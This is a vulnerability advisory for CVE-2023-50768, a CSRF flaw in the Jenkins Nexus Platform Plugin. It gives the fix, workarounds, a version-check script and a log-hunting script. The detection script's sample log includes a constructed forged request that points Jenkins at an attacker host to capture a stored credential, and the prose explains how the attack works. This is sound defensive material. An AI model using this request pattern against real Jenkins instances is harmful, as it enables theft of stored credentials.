CVE-2023-50768

8.8 HIGH

📋 TL;DR

A cross-site request forgery (CSRF) vulnerability in the Jenkins Nexus Platform Plugin (Jenkins advisory SECURITY-3203). Affected versions serve several HTTP endpoints that accept GET requests and lack permission checks. A page controlled by an attacker can make a logged-in user's browser call one of them with an attacker-chosen server URL and an attacker-chosen credentials ID; Jenkins then connects to the attacker's HTTP server and authenticates with the named stored credential, handing it over. The companion missing-permission-check issue from the same advisory is tracked as CVE-2023-50769. Every Jenkins instance running an affected plugin version is exposed.

💻 Affected Systems

Products:
  • Jenkins Nexus Platform Plugin
Versions: 3.18.0-03 and earlier
Operating Systems: All platforms running Jenkins
Default Config Vulnerable: ⚠️ Yes
Notes: Any Jenkins controller with the plugin enabled. In affected versions the endpoints check only Overall/Read, so any logged-in user can be the victim; the attacker needs no Jenkins account, only a credentials ID that is valid on that instance.

📦 What is this software?

The Nexus Platform Plugin (plugin ID nexus-jenkins-plugin) is Sonatype's Jenkins plugin for Nexus Repository Manager and Nexus IQ Server (Lifecycle). It publishes build artifacts to Nexus repositories and runs IQ policy evaluations from jobs and pipelines, and to do so it stores Nexus server URLs and references credentials kept in the Jenkins credential store.

⚠️ Risk & Real-World Impact

🔴 Worst Case

An attacker who can enumerate credentials IDs (for example from readable job or pipeline configuration) harvests every credential the victim's session can reach, then uses them against the artifact repositories, source code hosts and deployment targets downstream of Jenkins.

🟠 Likely Case

The attacker captures the one or two credentials named in the CSRF payload, typically the Nexus deploy or IQ account, and uses them to read or poison artifacts in the connected repository.

🟢 If Mitigated

With the plugin updated to 3.18.0-04 the affected endpoints require POST (so Jenkins' crumb check applies) and Overall/Administer; what remains is ordinary administrator-level configuration risk.

🌐 Internet-Facing: HIGH - the forged request is made by a logged-in user's browser, so any web page the user visits can target the instance, and public exposure also makes it easier for the attacker to collect valid credentials IDs.
🏢 Internal Only: MEDIUM - the attacker's page can be anywhere on the internet, because the victim's browser, not the attacker, reaches Jenkins. What an internal deployment does constrain is the second hop: Jenkins must be able to open an outbound connection to the attacker's server to hand over the credential.

🎯 Exploit Status

Public PoC: No known public proof of concept
Weaponized: UNKNOWN
Unauthenticated Exploit: No (the victim must be logged in; the attacker needs no account)
Complexity: LOW

Exploitation needs two things: a credentials ID that exists on the target Jenkins (the advisory notes these must be obtained through another method, such as job or pipeline configuration the attacker can read) and a logged-in user who opens an attacker-controlled page. Because the vulnerable endpoints accept GET, the forged request can be as simple as a link or redirect to the endpoint URL; browsers send the Jenkins session cookie on such top-level GET navigations even under the SameSite=Lax default, which is what blocks most cross-site POSTs.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 3.18.0-04 or later

Vendor Advisory: https://www.jenkins.io/security/advisory/2023-12-13/#SECURITY-3203

Restart Required: Yes

Instructions:

1. Update Jenkins Nexus Platform Plugin to version 3.18.0-04 or later via the Jenkins Plugin Manager.
2. Restart Jenkins to apply the update.

🔧 Temporary Workarounds

Jenkins' global CSRF protection does not cover this bug

Applies to: all platforms

Jenkins' crumb check applies to POST requests only; it has been mandatory since Jenkins 2.222, when the 'Prevent Cross Site Request Forgery exploits' checkbox was removed from Configure Global Security. The affected endpoints accept GET, so verifying or enabling crumb protection is not a mitigation for CVE-2023-50768. The fix works by making the endpoints require POST (bringing them under the crumb check) and Overall/Administer.

Reduce who can be a victim

Applies to: all platforms

In affected versions the endpoints need only Overall/Read, so every logged-in user is a potential victim. Until you patch, keep the set of accounts with Overall/Read as small as possible (Manage Jenkins → Security, called Configure Global Security on older releases; with the Role-based Authorization Strategy plugin, Manage and Assign Roles). There is no per-plugin 'Configure' permission to restrict.

🧯 If You Can't Patch

  • Disable or uninstall the Nexus Platform Plugin if it is not needed (Manage Jenkins → Plugins → Installed plugins); a disabled plugin is not loaded after restart, so its endpoints are no longer served
  • Restrict outbound HTTP/HTTPS from the Jenkins controller to your known Nexus Repository and IQ hosts; the credential is delivered by Jenkins connecting to an attacker-chosen server, so egress filtering blocks the exfiltration hop
  • Network segmentation around Jenkins does not stop the CSRF itself, since the request comes from the victim's browser rather than the attacker's machine
  • Rotate the Nexus credentials referenced by the plugin after patching if you suspect the endpoints were probed

🔍 How to Verify

Check if Vulnerable:

Manage Jenkins → Plugins → Installed plugins (Manage Plugins on older releases) → search for 'Nexus Platform Plugin' (plugin ID nexus-jenkins-plugin). Any version up to and including 3.18.0-03 is vulnerable.

Check Version:

From the command line (the CLI needs credentials; 'user:token' is a Jenkins username and API token): java -jar jenkins-cli.jar -s http://localhost:8080/ -auth user:token list-plugins | grep -i nexus
The same data is available over the REST API at /pluginManager/api/json?depth=1.

Verify Fix Applied:

The plugin version is 3.18.0-04 or higher and Jenkins has been restarted since the update; an updated plugin is not active until restart, and the plugin manager shows a pending-restart warning until then.
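The version check above can be scripted against the plugin manager's JSON API. The following is an added example, not code from the advisory or the plugin. It reads the shape of data Jenkins serves at /pluginManager/api/json?depth=1 (a core Jenkins endpoint); SAMPLE_RESPONSE is a constructed stand-in for that response so the script runs offline, and the plugin ID nexus-jenkins-plugin is the real plugin ID of the Nexus Platform Plugin. The version comparison is done field by field, because a plain string comparison would rank "3.18.0-10" below "3.18.0-04".

```python
"""Version check for CVE-2023-50768: is the installed Nexus Platform Plugin
older than the fixed 3.18.0-04? Added example, not from the advisory or the
plugin. SAMPLE_RESPONSE is a constructed plugin manager API response."""
import base64
import json
import os
import re
import urllib.request
from typing import Optional

PLUGIN_SHORT_NAME = "nexus-jenkins-plugin"   # plugin ID of "Nexus Platform Plugin"
FIXED_VERSION = "3.18.0-04"                  # first version with the SECURITY-3203 fix

# Constructed sample of /pluginManager/api/json?depth=1 (one vulnerable plugin).
SAMPLE_RESPONSE = json.dumps({
    "plugins": [
        {"shortName": "credentials", "longName": "Credentials Plugin",
         "version": "1319.v7eb_51b_3a_c97b_", "active": True},
        {"shortName": "nexus-jenkins-plugin", "longName": "Nexus Platform Plugin",
         "version": "3.18.0-03", "active": True},
    ]
})


def version_key(version: str) -> tuple:
    """Turn '3.18.0-03' into a tuple that sorts correctly: numeric fields compare
    as integers (so 03 < 04 and 9 < 10, which string comparison gets wrong);
    non-numeric fields such as 'SNAPSHOT' compare as text and sort before numbers."""
    return tuple((1, int(p)) if p.isdigit() else (0, p)
                 for p in re.split(r"[.\-_]", version))


def is_vulnerable(version: str, fixed: str = FIXED_VERSION) -> bool:
    """True when the installed version sorts before the fixed version."""
    return version_key(version) < version_key(fixed)


def find_plugin(api_json: str, short_name: str = PLUGIN_SHORT_NAME) -> Optional[dict]:
    """Return the plugin entry with the given shortName, or None if not installed."""
    for plugin in json.loads(api_json).get("plugins", []):
        if plugin.get("shortName") == short_name:
            return plugin
    return None


def assess(api_json: str) -> str:
    """Classify one plugin manager response as not installed / disabled / vulnerable / fixed."""
    plugin = find_plugin(api_json)
    if plugin is None:
        return "not installed"
    if not plugin.get("active", True):
        # A disabled plugin is not loaded, so its HTTP endpoints are not served.
        return f"installed {plugin['version']} but disabled"
    if is_vulnerable(plugin["version"]):
        return f"VULNERABLE ({plugin['version']})"
    return f"fixed ({plugin['version']})"


def fetch_plugin_list(base_url: str, user: str, api_token: str) -> str:
    """Fetch the live plugin list with HTTP basic auth (username + Jenkins API token)."""
    req = urllib.request.Request(
        base_url.rstrip("/") + "/pluginManager/api/json?depth=1&tree=plugins[shortName,version,active]")
    cred = base64.b64encode(f"{user}:{api_token}".encode()).decode()
    req.add_header("Authorization", "Basic " + cred)
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.read().decode()


if __name__ == "__main__":
    # Set JENKINS_URL, JENKINS_USER and JENKINS_TOKEN to query a real controller
    # (assumed environment variable names); otherwise the constructed sample is used.
    if os.environ.get("JENKINS_URL"):
        body = fetch_plugin_list(os.environ["JENKINS_URL"],
                                 os.environ["JENKINS_USER"], os.environ["JENKINS_TOKEN"])
    else:
        body = SAMPLE_RESPONSE
    print(assess(body))
```

Run it with no environment set to see the sample classified as vulnerable; point it at a real controller with a read-capable API token to check your own instance. Remember that the plugin manager reports the version that will be active after the next restart, so confirm the controller has actually restarted since the update.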

📡 Detection & Monitoring

Log Indicators:

  • Jenkins writes no HTTP access log by default, so use the reverse proxy in front of it (or Winstone's access logger) and look for GET requests to form-validation endpoints under /descriptorByName/ that carry both a credentialsId and a url parameter, especially with a missing or off-site Referer
  • Jenkins system log entries from the Nexus Platform Plugin about connection attempts or errors against hosts that are not your Nexus servers (useful only where the plugin logs those attempts)

Network Indicators:

  • The Jenkins controller opening HTTP(S) connections to hosts that are not your known Nexus Repository or IQ servers
  • Such a connection following immediately after an authenticated user's browser request to Jenkins

SIEM Query (Splunk-style, over an access log parsed into method, uri_path, uri_query and referer fields; the field names and the jenkins.example.com host are placeholders to adapt to your schema):

source="jenkins-access.log" method=GET uri_path="*/descriptorByName/*" uri_query="*credentialsId=*" NOT referer="https://jenkins.example.com/*"
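The same hunt expressed as a script over combined-format access-log lines, as an added example that is not part of the advisory. The lines would come from a reverse proxy or from Winstone's access logger (Jenkins started with --accessLoggerClassName=winstone.accesslog.SimpleAccessLogger and --simpleAccessLogger.format=combined); every line below is constructed. The path com.example.NexusDescriptor/doTestConnection is a placeholder shaped like Jenkins' /descriptorByName/<class>/do<Action> convention, not the plugin's real endpoint, which the advisory does not name; JENKINS_HOST and KNOWN_NEXUS_HOSTS are assumed values for your environment.

```python
"""Hunt for CSRF-style credential probes against Jenkins form-validation
endpoints in combined-format access-log lines. Added example; log lines,
endpoint path and host names are constructed placeholders."""
import re
from urllib.parse import parse_qs, urlsplit

JENKINS_HOST = "jenkins.corp.example"        # assumed: the host users reach Jenkins on
KNOWN_NEXUS_HOSTS = {"nexus.corp.example"}   # assumed: servers the plugin may legitimately contact

# Apache/nginx "combined" format: ip ident user [ts] "method target proto" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Constructed sample: a benign validation call, a forged one, one with no
# Referer, and an unrelated page view from the same cross-site page.
SAMPLE_LOG = """\
10.0.0.5 - bob [14/Dec/2023:10:15:01 +0000] "GET /descriptorByName/com.example.NexusDescriptor/doTestConnection?url=https://nexus.corp.example/&credentialsId=nexus-deploy HTTP/1.1" 200 52 "https://jenkins.corp.example/configure" "Mozilla/5.0"
10.0.0.9 - alice [14/Dec/2023:10:15:32 +0000] "GET /descriptorByName/com.example.NexusDescriptor/doTestConnection?url=http://203.0.113.7:8080/&credentialsId=nexus-deploy HTTP/1.1" 200 52 "http://attacker.example/" "Mozilla/5.0"
10.0.0.7 - carol [14/Dec/2023:10:16:10 +0000] "GET /descriptorByName/com.example.NexusDescriptor/doTestConnection?url=https://nexus.corp.example/&credentialsId=nexus-deploy HTTP/1.1" 200 52 "-" "Mozilla/5.0"
10.0.0.9 - alice [14/Dec/2023:10:17:00 +0000] "GET /job/build-app/ HTTP/1.1" 200 8123 "http://attacker.example/" "Mozilla/5.0"
"""


def parse_combined(line: str):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    target = urlsplit(entry["target"])
    entry["path"] = target.path
    entry["query"] = parse_qs(target.query)
    return entry


def probe_reasons(entry, jenkins_host=JENKINS_HOST, known_hosts=KNOWN_NEXUS_HOSTS):
    """Reasons to suspect a forged credential probe; empty when the request is
    not a credentialsId-bearing form-validation call or looks benign."""
    if "/descriptorByName/" not in entry["path"] or "credentialsId" not in entry["query"]:
        return []
    reasons = []
    referer = entry["referer"]
    ref_host = urlsplit(referer).hostname if referer not in ("", "-") else None
    if ref_host is None:
        # Strict referrer policies also strip Referer, so this alone is low confidence.
        reasons.append("no Referer on a credential-using endpoint")
    elif ref_host != jenkins_host:
        # The request was issued from a page on another site: the CSRF signature.
        reasons.append(f"cross-site Referer {ref_host}")
    for url in entry["query"].get("url", []):
        host = urlsplit(url).hostname
        if host not in known_hosts:
            # Jenkins would send the named credential to this server.
            reasons.append(f"credentials sent to unknown server {host}")
    return reasons


def scan(lines):
    """Return one hit per suspicious request, with the user, method, credentialsId and reasons."""
    hits = []
    for line in lines:
        entry = parse_combined(line)
        if entry is None:
            continue
        reasons = probe_reasons(entry)
        if reasons:
            hits.append({"user": entry["user"], "method": entry["method"],
                         "credentialsId": entry["query"]["credentialsId"][0],
                         "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG.splitlines()):
        print(hit)
```

On the sample, bob's call from the Jenkins UI to a known Nexus host is ignored, alice's request is flagged twice (cross-site Referer and an unknown destination server), carol's is flagged once at low confidence because the Referer is missing, and alice's ordinary page view from the same attacker page is not a hit because it touches no credential-using endpoint. After patching, any GET that still reaches one of these endpoints is itself worth alerting on, since fixed versions only accept POST.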

🔗 References

  • Jenkins Security Advisory 2023-12-13, SECURITY-3203: https://www.jenkins.io/security/advisory/2023-12-13/#SECURITY-3203
  • NVD entry for CVE-2023-50768: https://nvd.nist.gov/vuln/detail/CVE-2023-50768